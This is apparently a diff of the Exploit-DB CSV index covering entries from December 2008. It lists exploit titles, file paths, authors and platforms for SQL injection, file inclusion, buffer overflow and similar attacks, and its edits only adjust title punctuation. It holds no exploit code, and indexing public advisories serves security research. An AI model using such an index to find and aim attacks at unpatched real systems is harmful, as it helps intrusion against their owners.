7358,platforms/windows/dos/7358.html,"Visagesoft eXPert PDF EditorX (VSPDFEditorX.ocx) Insecure Method",2008-12-05,"Marco Torti",windows,dos,0 -7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 (news.mdb) Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0 +7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 - (news.mdb) Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0 7360,platforms/asp/webapps/7360.txt,"ASP AutoDealer Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 7361,platforms/asp/webapps/7361.txt,"ASP PORTAL (xportal.mdb) Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0 7362,platforms/windows/dos/7362.py,"DesignWorks Professional 4.3.1 - Local .CCT File Stack BoF PoC",2008-12-06,Cnaph,windows,dos,0 -7363,platforms/php/webapps/7363.txt,"phpPgAdmin <= 4.2.1 (_language) Local File Inclusion",2008-12-06,dun,php,webapps,0 +7363,platforms/php/webapps/7363.txt,"phpPgAdmin <= 4.2.1 - (_language) Local File Inclusion",2008-12-06,dun,php,webapps,0 7364,platforms/php/webapps/7364.php,"IPNPro3 <= 1.44 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7365,platforms/php/webapps/7365.php,"DL PayCart <= 1.34 Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7366,platforms/php/webapps/7366.php,"Bonza Cart <= 1.10 Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7367,platforms/php/webapps/7367.php,"PayPal eStore Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0 7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b (forum_topic_id) SQL Injection",2008-12-07,b3hz4d,php,webapps,0 7369,platforms/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload & LFI Exploit",2008-12-07,DNX,php,webapps,0 -7370,platforms/asp/webapps/7370.txt,"NatterChat 1.12 (natterchat112.mdb) Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0 +7370,platforms/asp/webapps/7370.txt,"NatterChat 1.12 - (natterchat112.mdb) Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0 7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7372,platforms/asp/webapps/7372.txt,"Ikon AdManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 7373,platforms/asp/webapps/7373.txt,"aspmanage banners - (RFU/DD) Multiple Vulnerabilities",2008-12-07,ZoRLu,asp,webapps,0 -7374,platforms/php/webapps/7374.txt,"Mini Blog 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities",2008-12-07,cOndemned,php,webapps,0 -7375,platforms/php/webapps/7375.txt,"Mini-CMS 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities",2008-12-07,cOndemned,php,webapps,0 +7374,platforms/php/webapps/7374.txt,"Mini Blog 1.0.1 - (index.php) Multiple Local File Inclusion Vulnerabilities",2008-12-07,cOndemned,php,webapps,0 +7375,platforms/php/webapps/7375.txt,"Mini-CMS 1.0.1 - (index.php) Multiple Local File Inclusion Vulnerabilities",2008-12-07,cOndemned,php,webapps,0 7376,platforms/asp/webapps/7376.txt,"QMail Mailing List Manager 1.2 Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0 -7377,platforms/php/webapps/7377.txt,"PHPmyGallery Gold 1.51 (index.php) Directory Traversal",2008-12-07,zAx,php,webapps,0 +7377,platforms/php/webapps/7377.txt,"PHPmyGallery Gold 1.51 - (index.php) Directory Traversal",2008-12-07,zAx,php,webapps,0 7378,platforms/asp/webapps/7378.txt,"asp talk - (SQL/css) Multiple Vulnerabilities",2008-12-07,Bl@ckbe@rD,asp,webapps,0 -7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 (filename) Remote Code Execution",2008-12-08,"Alfons Luja",php,webapps,0 +7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 - (filename) Remote Code Execution",2008-12-08,"Alfons Luja",php,webapps,0 7380,platforms/php/webapps/7380.txt,"XOOPS 2.3.1 - Multiple Local File Inclusion Vulnerabilities",2008-12-08,DSecRG,php,webapps,0 7381,platforms/php/webapps/7381.txt,"siu guarani - Multiple Vulnerabilities",2008-12-08,"Ubik & proudhon",php,webapps,0 7382,platforms/php/webapps/7382.txt,"phpMyAdmin 3.1.0 - (CSRF) SQL Injection",2008-12-08,"Michael Brooks",php,webapps,0 7383,platforms/php/webapps/7383.txt,"Simple Directory Listing 2 - Cross-Site File Upload",2008-12-08,"Michael Brooks",php,webapps,0 7384,platforms/windows/remote/7384.txt,"XAMPP 1.6.8 - (CSRF) Change Administrative Password Exploit",2008-12-08,"Michael Brooks",windows,remote,0 7385,platforms/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection",2008-12-08,Cnaph,php,webapps,0 -7386,platforms/php/webapps/7386.pl,"phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit",2008-12-08,StAkeR,php,webapps,0 +7386,platforms/php/webapps/7386.pl,"phpBB 3 - (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit",2008-12-08,StAkeR,php,webapps,0 7387,platforms/windows/dos/7387.py,"Neostrada Livebox Router Remote Network Down PoC Exploit",2008-12-08,0in,windows,dos,0 7388,platforms/php/webapps/7388.txt,"webcaf <= 1.4 - (LFI/RCE) Multiple Vulnerabilities",2008-12-08,dun,php,webapps,0 7389,platforms/hardware/remote/7389.htm,"DD-WRT v24-sp1 - (CSRF) Cross-Site Reference Forgery Exploit",2008-12-08,"Michael Brooks",hardware,remote,0 7390,platforms/asp/webapps/7390.txt,"Professional Download Assistant 0.1 - (Auth Bypass) SQL Injection",2008-12-09,ZoRLu,asp,webapps,0 -7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 (Auth Bypass) Remote SQL Injection",2008-12-09,AlpHaNiX,asp,webapps,0 +7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 - (Auth Bypass) Remote SQL Injection",2008-12-09,AlpHaNiX,asp,webapps,0 7392,platforms/php/webapps/7392.txt,"phpmygallery 1.0beta2 - (RFI/LFI) Multiple Vulnerabilities",2008-12-09,ZoRLu,php,webapps,0 7393,platforms/linux/local/7393.txt,"PHP safe_mode bypass via proc_open() and custom environment",2008-12-09,gat3way,linux,local,0 -7395,platforms/php/webapps/7395.txt,"Peel Shopping 3.1 (index.php rubid) SQL Injection",2008-12-09,SuB-ZeRo,php,webapps,0 +7395,platforms/php/webapps/7395.txt,"Peel Shopping 3.1 - (index.php rubid) SQL Injection",2008-12-09,SuB-ZeRo,php,webapps,0 7396,platforms/php/webapps/7396.txt,"Netref 4.0 - Multiple Remote SQL Injection Vulnerabilities",2008-12-09,SuB-ZeRo,php,webapps,0 -7397,platforms/php/webapps/7397.txt,"ProQuiz 1.0 (Auth Bypass) SQL Injection",2008-12-09,Osirys,php,webapps,0 +7397,platforms/php/webapps/7397.txt,"ProQuiz 1.0 - (Auth Bypass) SQL Injection",2008-12-09,Osirys,php,webapps,0 7398,platforms/asp/webapps/7398.txt,"postecards - (SQL/DD) Multiple Vulnerabilities",2008-12-09,AlpHaNiX,asp,webapps,0 7399,platforms/php/webapps/7399.txt,"PHPmyGallery 1.5beta - (common-tpl-vars.php) LFI/RFI Vulnerabilities",2008-12-09,CoBRa_21,php,webapps,0 7400,platforms/php/webapps/7400.txt,"PHP Multiple Newsletters 2.7 - (LFI/XSS) Multiple Vulnerabilities",2008-12-09,ahmadbady,php,webapps,0 7401,platforms/windows/dos/7401.txt,"Vinagre < 2.24.2 show_error() Remote Format String PoC",2008-12-09,"Core Security",windows,dos,0 7402,platforms/windows/remote/7402.html,"EasyMail ActiveX (emmailstore.dll 6.5.0.3) Buffer Overflow Exploit",2008-12-09,e.wiZz!,windows,remote,0 7403,platforms/windows/remote/7403.txt,"Microsoft Internet Explorer - XML Parsing Remote Buffer Overflow Exploit (0Day)",2008-12-10,"Guido Landi",windows,remote,0 -7404,platforms/cgi/webapps/7404.txt,"HTMPL 1.11 (htmpl_admin.cgi help) Command Execution",2008-12-10,ZeN,cgi,webapps,0 +7404,platforms/cgi/webapps/7404.txt,"HTMPL 1.11 - (htmpl_admin.cgi help) Command Execution",2008-12-10,ZeN,cgi,webapps,0 7405,platforms/linux/dos/7405.c,"Linux Kernel <= 2.6.27.8 - ATMSVC Local Denial of Service Exploit",2008-12-10,"Jon Oberheide",linux,dos,0 7406,platforms/php/webapps/7406.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation Exploit",2008-12-10,s4avrd0w,php,webapps,0 7407,platforms/php/webapps/7407.txt,"Webmaster Marketplace (member.php u) SQL Injection",2008-12-10,"Hussin X",php,webapps,0 7408,platforms/php/webapps/7408.txt,"living Local 1.1 - (XSS/rfu) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0 7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - (XSS/CSRF) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0 7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow Exploit (Vista) (0Day)",2008-12-10,muts,windows,remote,0 -7411,platforms/php/webapps/7411.txt,"Butterfly Organizer 2.0.1 (view.php id) SQL Injection",2008-12-10,Osirys,php,webapps,0 +7411,platforms/php/webapps/7411.txt,"Butterfly Organizer 2.0.1 - (view.php id) SQL Injection",2008-12-10,Osirys,php,webapps,0 7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 - (SQL/DD) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0 7413,platforms/asp/webapps/7413.pl,"CF_Calendar (calendarevent.cfm) Remote SQL Injection Exploit",2008-12-10,AlpHaNiX,asp,webapps,0 7414,platforms/asp/webapps/7414.txt,"CF_Auction (forummessage) Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7415,platforms/asp/webapps/7415.txt,"CFMBLOG (index.cfm categorynbr) Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 7416,platforms/asp/webapps/7416.txt,"CF_Forum Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps,0 -7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 (editform) Local File Inclusion",2008-12-10,nuclear,php,webapps,0 -7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 (Cookie) Login Bypass",2008-12-11,x0r,php,webapps,0 +7417,platforms/php/webapps/7417.txt,"phpAddEdit 1.3 - (editform) Local File Inclusion",2008-12-10,nuclear,php,webapps,0 +7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - (Cookie) Login Bypass",2008-12-11,x0r,php,webapps,0 7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps,0 7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - (mycal.mdb) Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0 7421,platforms/php/webapps/7421.txt,"eZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution Exploit (admin req)",2008-12-11,s4avrd0w,php,webapps,0 7422,platforms/php/webapps/7422.txt,"Feed CMS 1.07.03.19b (lang) Local File Inclusion",2008-12-11,x0r,php,webapps,0 -7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 (Auth Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 +7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - (Auth Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 7424,platforms/asp/webapps/7424.txt,"Ad Management Java (Auth Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 7425,platforms/asp/webapps/7425.txt,"Banner Exchange Java (Auth Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0 7426,platforms/php/webapps/7426.txt,"PHP Support Tickets 2.2 - Remote File Upload",2008-12-11,ahmadbady,php,webapps,0 7427,platforms/asp/webapps/7427.txt,"The Net Guys ASPired2Poll Remote Database Disclosure",2008-12-11,AlpHaNiX,asp,webapps,0 7428,platforms/asp/webapps/7428.txt,"The Net Guys ASPired2Protect Database Disclosure",2008-12-12,AlpHaNiX,asp,webapps,0 -7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 (index.asp cha) SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps,0 -7430,platforms/php/webapps/7430.txt,"SUMON <= 0.7.0 (chg.php host) Command Execution",2008-12-12,dun,php,webapps,0 +7429,platforms/asp/webapps/7429.txt,"ASP-CMS 1.0 - (index.asp cha) SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps,0 +7430,platforms/php/webapps/7430.txt,"SUMON <= 0.7.0 - (chg.php host) Command Execution",2008-12-12,dun,php,webapps,0 7431,platforms/windows/dos/7431.pl,"Microsoft Visual Basic ActiveX Controls mscomct2.ocx Buffer Overflow PoC",2008-12-12,"Jerome Athias",windows,dos,0 -7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 (home.html menu) Blind SQL Injection",2008-12-12,XaDoS,php,webapps,0 +7432,platforms/php/webapps/7432.txt,"Xpoze 4.10 - (home.html menu) Blind SQL Injection",2008-12-12,XaDoS,php,webapps,0 7433,platforms/php/webapps/7433.txt,"Social Groupie (group_index.php id) Remote SQL Injection",2008-12-12,InjEctOr5,php,webapps,0 7434,platforms/php/webapps/7434.sh,"Wysi Wiki Wyg 1.0 - Remote Password Retrieve Exploit",2008-12-12,StAkeR,php,webapps,0 7435,platforms/php/webapps/7435.txt,"Social Groupie (create_album.php) Remote File Upload",2008-12-12,InjEctOr5,php,webapps,0 @@ -6990,16 +6990,16 @@ id,file,description,date,author,platform,type,port 7446,platforms/asp/webapps/7446.txt,"ASPired2Quote (quote.mdb) Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps,0 7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System - (Auth Bypass) SQL Injection",2008-12-14,Pouya_Server,asp,webapps,0 7448,platforms/php/webapps/7448.txt,"autositephp 2.0.3 - (LFI/CSRF/edit file) Multiple Vulnerabilities",2008-12-14,SirGod,php,webapps,0 -7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 (iyziforum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0 +7449,platforms/php/webapps/7449.txt,"iyzi Forum 1.0b3 - (iyziforum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps,0 7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum (CAForum.mdb) Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0 7451,platforms/php/webapps/7451.txt,"php weather 2.2.2 - (LFI/XSS) Multiple Vulnerabilities",2008-12-14,ahmadbady,php,webapps,0 7452,platforms/windows/remote/7452.pl,"ProSysInfo TFTP server TFTPDWIN <= 0.4.2 Univ. Remote BoF Exploit",2008-12-14,SkD,windows,remote,69 7453,platforms/php/webapps/7453.txt,"FLDS 1.2a (redir.php id) Remote SQL Injection",2008-12-14,nuclear,php,webapps,0 7454,platforms/linux/dos/7454.c,"Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local DoS Exploit",2008-12-14,Adurit-T,linux,dos,0 -7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 (download.php) Remote",2008-12-14,x0r,php,webapps,0 +7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - (download.php) Remote",2008-12-14,x0r,php,webapps,0 7456,platforms/php/webapps/7456.txt,"Availscript Article Script Remote File Upload",2008-12-14,S.W.A.T.,php,webapps,0 7457,platforms/php/webapps/7457.txt,"Availscript Classmate Script Remote File Upload",2008-12-14,S.W.A.T.,php,webapps,0 -7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 (index.php lang) Local File Inclusion",2008-12-14,Osirys,php,webapps,0 +7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 - (index.php lang) Local File Inclusion",2008-12-14,Osirys,php,webapps,0 7459,platforms/php/webapps/7459.txt,"CFAGCMS 1 - Remote File Inclusion Vulnerabilities",2008-12-14,BeyazKurt,php,webapps,0 7460,platforms/windows/dos/7460.html,"EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC",2008-12-14,Bl@ckbe@rD,windows,dos,0 7461,platforms/php/webapps/7461.txt,"Flatnux html/javascript Injection Cookie Grabber Exploit",2008-12-14,gmda,php,webapps,0 @@ -7007,8 +7007,8 @@ id,file,description,date,author,platform,type,port 7463,platforms/php/webapps/7463.txt,"ASPSiteWare Automotive Dealer 1.0 & 2.0 - SQL Injection",2008-12-14,AlpHaNiX,php,webapps,0 7464,platforms/asp/webapps/7464.txt,"ASPSiteWare RealtyListing 1.0 & 2.0 - SQL Injection Vulnerabilities",2008-12-14,AlpHaNiX,asp,webapps,0 7465,platforms/php/webapps/7465.txt,"isweb CMS 3.0 - (SQL/XSS) Multiple Vulnerabilities",2008-12-14,XaDoS,php,webapps,0 -7466,platforms/asp/webapps/7466.txt,"Forest Blog 1.3.2 (blog.mdb) Remote Database Disclosure",2008-12-15,"Cold Zero",asp,webapps,0 -7467,platforms/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 (html tag) Buffer Overflow PoC",2008-12-15,webDEViL,multiple,dos,0 +7466,platforms/asp/webapps/7466.txt,"Forest Blog 1.3.2 - (blog.mdb) Remote Database Disclosure",2008-12-15,"Cold Zero",asp,webapps,0 +7467,platforms/multiple/dos/7467.txt,"Amaya Web Browser 10.0.1/10.1-pre5 - (html tag) Buffer Overflow PoC",2008-12-15,webDEViL,multiple,dos,0 7468,platforms/asp/webapps/7468.txt,"CodeAvalanche Directory - (CADirectory.mdb) Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7469,platforms/asp/webapps/7469.txt,"CodeAvalanche FreeForAll - (CAFFAPage.mdb) Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7470,platforms/asp/webapps/7470.txt,"CodeAvalanche FreeWallpaper Remote Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 @@ -7016,10 +7016,10 @@ id,file,description,date,author,platform,type,port 7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite (CARateMySite.mdb) Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0 7473,platforms/php/webapps/7473.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation Exploit",2008-12-15,s4avrd0w,php,webapps,0 7474,platforms/php/webapps/7474.txt,"FLDS 1.2a (lpro.php id) Remote SQL Injection",2008-12-15,nuclear,php,webapps,0 -7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 (username) CSRF/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0 +7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - (username) CSRF/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0 7476,platforms/php/webapps/7476.txt,"Mediatheka <= 4.2 - Remote Blind SQL Injection Exploit",2008-12-15,StAkeR,php,webapps,0 7477,platforms/windows/remote/7477.html,"Microsoft Internet Explorer XML Parsing Buffer Overflow Exploit (allinone)",2008-12-15,krafty,windows,remote,0 -7478,platforms/php/webapps/7478.txt,"The Rat CMS Alpha 2 (Auth Bypass) SQL Injection",2008-12-15,x0r,php,webapps,0 +7478,platforms/php/webapps/7478.txt,"The Rat CMS Alpha 2 - (Auth Bypass) SQL Injection",2008-12-15,x0r,php,webapps,0 7479,platforms/php/webapps/7479.txt,"XOOPS Module Amevents (print.php id) SQL Injection",2008-12-15,nétRoot,php,webapps,0 7480,platforms/php/webapps/7480.txt,"CadeNix (cid) Remote SQL Injection",2008-12-15,HaCkeR_EgY,php,webapps,0 7481,platforms/php/webapps/7481.txt,"WorkSimple 1.2.1 - RFI / Sensitive Data Disclosure Vulnerabilities",2008-12-15,Osirys,php,webapps,0 @@ -7029,7 +7029,7 @@ id,file,description,date,author,platform,type,port 7485,platforms/asp/webapps/7485.txt,"clickandemail - (SQL/XSS) Multiple Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 7486,platforms/asp/webapps/7486.txt,"click&rank - (SQL/XSS) Multiple Vulnerabilities",2008-12-15,AlpHaNiX,asp,webapps,0 7487,platforms/php/webapps/7487.txt,"FaScript FaUpload (download.php) SQL Injection",2008-12-16,"Aria-Security Team",php,webapps,0 -7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 (WWGguestbook.mdb) DD",2008-12-16,"Cold Zero",asp,webapps,0 +7488,platforms/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - (WWGguestbook.mdb) DD",2008-12-16,"Cold Zero",asp,webapps,0 7489,platforms/php/webapps/7489.pl,"FLDS 1.2a report.php (linkida) Remote SQL Injection Exploit",2008-12-16,ka0x,php,webapps,0 7490,platforms/php/webapps/7490.php,"Aiyoota! CMS - Blind SQL Injection Exploit",2008-12-16,Lidloses_Auge,php,webapps,0 7491,platforms/asp/webapps/7491.txt,"Nukedit 4.9.8 - Remote Database Disclosure",2008-12-16,Cyber.Zer0,asp,webapps,0 @@ -7057,20 +7057,20 @@ id,file,description,date,author,platform,type,port 7514,platforms/php/webapps/7514.txt,"I-Rater Basic (messages.php) Remote SQL Injection",2008-12-18,boom3rang,php,webapps,0 7515,platforms/php/webapps/7515.txt,"phpclanwebsite <= 1.23.3 fix pack #5 - Multiple Vulnerabilities",2008-12-18,s4avrd0w,php,webapps,0 7516,platforms/windows/local/7516.txt,"ESET Smart Security <= 3.0.672 - (epfw.sys) Privilege Escalation Exploit",2008-12-18,"NT Internals",windows,local,0 -7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 (id) Remote SQL Injection",2008-12-18,fuzion,php,webapps,0 +7517,platforms/php/webapps/7517.txt,"Injader CMS 2.1.1 - (id) Remote SQL Injection",2008-12-18,fuzion,php,webapps,0 7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 Insecure Cookie Handling",2008-12-18,x0r,php,webapps,0 7519,platforms/php/webapps/7519.txt,"MyPHPsite (index.php mod) Local File Inclusion",2008-12-18,Piker,php,webapps,0 -7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 (mDNS Daemon) Remote Denial of Service Exploit",2008-12-19,"Jon Oberheide",multiple,dos,0 +7520,platforms/multiple/dos/7520.c,"Avahi < 0.6.24 - (mDNS Daemon) Remote Denial of Service Exploit",2008-12-19,"Jon Oberheide",multiple,dos,0 7521,platforms/windows/remote/7521.txt,"webcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,windows,remote,0 7522,platforms/php/webapps/7522.pl,"MyPBS (index.php seasonID) Remote SQL Injection Exploit",2008-12-19,Piker,php,webapps,0 7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone Admin Password Changing Exploit",2008-12-19,G4N0K,php,webapps,0 7524,platforms/php/webapps/7524.txt,"Online Keyword Research Tool - (download.php) File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 7525,platforms/php/webapps/7525.txt,"Extract Website - (download.php filename) File Disclosure",2008-12-19,"Cold Zero",php,webapps,0 7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - XSS/Database Disclosure Vulnerabilities",2008-12-19,Osirys,php,webapps,0 -7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 (source.php p) Remote File Disclosure",2008-12-19,Piker,php,webapps,0 +7527,platforms/php/webapps/7527.txt,"FreeLyrics 1.0 - (source.php p) Remote File Disclosure",2008-12-19,Piker,php,webapps,0 7528,platforms/php/webapps/7528.pl,"OneOrZero helpdesk 1.6.x. - Remote Shell Upload Exploit",2008-12-19,Ams,php,webapps,0 7529,platforms/php/webapps/7529.txt,"constructr CMS <= 3.02.5 stable - Multiple Vulnerabilities",2008-12-19,fuzion,php,webapps,0 -7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 (y) Remote Blind SQL Injection Exploit",2008-12-21,katharsis,php,webapps,0 +7530,platforms/php/webapps/7530.pl,"Userlocator 3.0 - (y) Remote Blind SQL Injection Exploit",2008-12-21,katharsis,php,webapps,0 7531,platforms/php/webapps/7531.txt,"ReVou Twitter Clone Arbitrary File Upload",2008-12-21,S.W.A.T.,php,webapps,0 7532,platforms/php/webapps/7532.txt,"chicomas <= 2.0.4 - (DB Backup/DD/XSS) Multiple Vulnerabilities",2008-12-21,BugReport.IR,php,webapps,0 7533,platforms/windows/local/7533.txt,"PowerStrip <= 3.84 - (pstrip.sys) Privilege Escalation Exploit",2008-12-21,"NT Internals",windows,local,0 @@ -7086,31 +7086,31 @@ id,file,description,date,author,platform,type,port 7543,platforms/php/webapps/7543.txt,"WordPress Plugin Page Flip Image Gallery <= 0.2.2 - Remote FD",2008-12-22,GoLd_M,php,webapps,0 7544,platforms/php/webapps/7544.txt,"Pligg 9.9.5b (check_url.php url) Upload Shell/SQL Injection Exploit",2008-12-22,Ams,php,webapps,0 7545,platforms/php/webapps/7545.txt,"yourplace <= 1.0.2 - Multiple Vulnerabilities + RCE Exploit",2008-12-22,Osirys,php,webapps,0 -7546,platforms/php/webapps/7546.txt,"Joomla Component Volunteer 2.0 (job_id) SQL Injection",2008-12-22,boom3rang,php,webapps,0 +7546,platforms/php/webapps/7546.txt,"Joomla Component Volunteer 2.0 - (job_id) SQL Injection",2008-12-22,boom3rang,php,webapps,0 7547,platforms/windows/local/7547.py,"CoolPlayer 2.19 - (Skin File) Local Buffer Overflow Exploit (Python)",2008-12-22,"Encrypt3d.M!nd ",windows,local,0 -7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 (Forum) Remote Cookies Disclosure Exploit",2008-12-22,StAkeR,php,webapps,0 +7548,platforms/php/webapps/7548.php,"SolarCMS 0.53.8 - (Forum) Remote Cookies Disclosure Exploit",2008-12-22,StAkeR,php,webapps,0 7549,platforms/php/webapps/7549.txt,"RoundCube Webmail <= 0.2-3 beta Code Execution",2008-12-22,"Jacobo Gimeno",php,webapps,0 7550,platforms/multiple/local/7550.c,"CUPS < 1.3.8-4 - (pstopdf filter) Privilege Escalation Exploit",2008-12-22,"Jon Oberheide",multiple,local,0 -7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 (Auth Bypass) SQL Injection",2008-12-22,StAkeR,php,webapps,0 +7551,platforms/php/webapps/7551.txt,"Calendar Script 1.1 - (Auth Bypass) SQL Injection",2008-12-22,StAkeR,php,webapps,0 7552,platforms/php/webapps/7552.txt,"REDPEACH CMS (zv) Remote SQL Injection",2008-12-22,Lidloses_Auge,php,webapps,0 7553,platforms/php/webapps/7553.sh,"RoundCube Webmail <= 0.2b Remote Code Execution Exploit",2008-12-22,Hunger,php,webapps,0 7554,platforms/windows/dos/7554.pl,"Mozilla Firefox 3.0.5 location.hash Remote Crash Exploit",2008-12-23,"Jeremy Brown",windows,dos,0 7555,platforms/multiple/dos/7555.py,"Psi Jabber Client (8010/tcp) Remote Denial of Service Exploit (win/lin)",2008-12-23,Sha0,multiple,dos,0 -7556,platforms/windows/dos/7556.php,"PGP Desktop 9.0.6 (PGPwded.sys) Local Denial of Service Exploit",2008-12-23,Evilcry,windows,dos,0 +7556,platforms/windows/dos/7556.php,"PGP Desktop 9.0.6 - (PGPwded.sys) Local Denial of Service Exploit",2008-12-23,Evilcry,windows,dos,0 7557,platforms/php/webapps/7557.txt,"PHPmotion <= 2.1 - CSRF",2008-12-23,Ausome1,php,webapps,0 -7558,platforms/php/webapps/7558.txt,"phpLD 3.3 (page.php name) Blind SQL Injection",2008-12-23,fuzion,php,webapps,0 -7559,platforms/php/webapps/7559.php,"CMS NetCat 3.12 (password_recovery.php) Blind SQL Injection Exploit",2008-12-23,s4avrd0w,php,webapps,0 +7558,platforms/php/webapps/7558.txt,"phpLD 3.3 - (page.php name) Blind SQL Injection",2008-12-23,fuzion,php,webapps,0 +7559,platforms/php/webapps/7559.php,"CMS NetCat 3.12 - (password_recovery.php) Blind SQL Injection Exploit",2008-12-23,s4avrd0w,php,webapps,0 7560,platforms/php/webapps/7560.txt,"cms netcat <= 3.12 - Multiple Vulnerabilities",2008-12-23,s4avrd0w,php,webapps,0 7561,platforms/php/webapps/7561.txt,"phpGreetCards XSS/Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 7562,platforms/php/webapps/7562.txt,"phpAdBoard (php uploads) Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 7563,platforms/php/webapps/7563.txt,"phpEmployment (php upload) Arbitrary File Upload",2008-12-23,ahmadbady,php,webapps,0 7564,platforms/multiple/dos/7564.pl,"Getleft 1.2 - Remote Buffer Overflow Proof of Concept",2008-12-23,Koshi,multiple,dos,0 -7565,platforms/php/webapps/7565.txt,"StormBoard 1.0.1 (thread.php id) SQL Injection",2008-12-23,Samir-M,php,webapps,0 +7565,platforms/php/webapps/7565.txt,"StormBoard 1.0.1 - (thread.php id) SQL Injection",2008-12-23,Samir-M,php,webapps,0 7566,platforms/windows/remote/7566.html,"Google Chrome Browser (ChromeHTML://) Remote Parameter Injection",2008-12-23,Nine:Situations:Group,windows,remote,0 7567,platforms/php/webapps/7567.txt,"Joomla Component com_lowcosthotels - (id) Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0 7568,platforms/php/webapps/7568.txt,"Joomla Component com_allhotels (id) Blind SQL Injection",2008-12-23,"Hussin X",php,webapps,0 7569,platforms/php/webapps/7569.txt,"doop CMS <= 1.4.0b - (CSRF/upload shell) Multiple 